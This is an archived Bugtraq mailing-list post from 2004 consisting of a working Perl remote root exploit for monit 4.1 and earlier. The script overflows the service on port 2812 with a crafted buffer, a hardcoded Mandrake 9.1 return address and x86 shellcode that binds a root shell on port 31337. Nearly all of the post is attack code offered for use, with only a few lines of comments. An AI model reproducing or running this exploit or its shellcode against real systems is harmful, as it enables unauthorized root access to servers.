| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 9 Apr 2004 11:11:50 -0000
From: gsicht gsicht <nothing.king@...email.de>
To: bugtraq@...urityfocus.com
Subject: monit 4.1 POC
#!/usr/bin/perl
# cobain-monit.pl
#
# monit <= 4.1 remote root exploit
# coded by gsicht (08.04.04)
# kurt cobain died 10 years ago ;(
#
# tested on mandrake 9.1
# 0x40b389cf esp+3
#
use IO::Socket::INET;
$socket = 0;
my $shellcode = # 8 + 88 = 96 bytes portbind 31337
"\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" .
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" .
"\x89\xc7\x52\x66\x68" .
"\x7a\x69" . # port 31337/tcp, change if needed
"\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80" .
"\xb0\x66\xb3\x04\xcd\x80" .
"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80" .
"\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" .
"\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80";
print "\nmonit 4.1 dos exploit\n";
print "coded by gsicht (08.04.04)\nnothing.king@...email.de\n\n";
if(@ARGV<1)
{
print "Usage: perl agate.pl <target>\n\n";
exit(0);
}
print "HOST:\t$ARGV[0]\n";
print "PORT:\t2812\n";
my $buffer = "B" x 284 . "\xcf\x89\xb3\x40" . $shellcode; # esp mandrake 9.1
#my $buffer = "A" x 284 . "XXXX" . "B" x 100; #dos and debug
print "connecting to server...\n";
$socket = IO::Socket::INET -> new( PeerAddr => $ARGV[0],
PeerPort => 2812,
Proto => "tcp");
if(!defined($socket))
{
print "could not connect :-P\n";
sleep(1);
exit(0);
}
print "connected\n";
sleep(1);
print "sending string\n";
print $socket $buffer;
close $socket;
print "\nnow try to connect to port 31337\n";
sleep(4);
Powered by blists - more mailing lists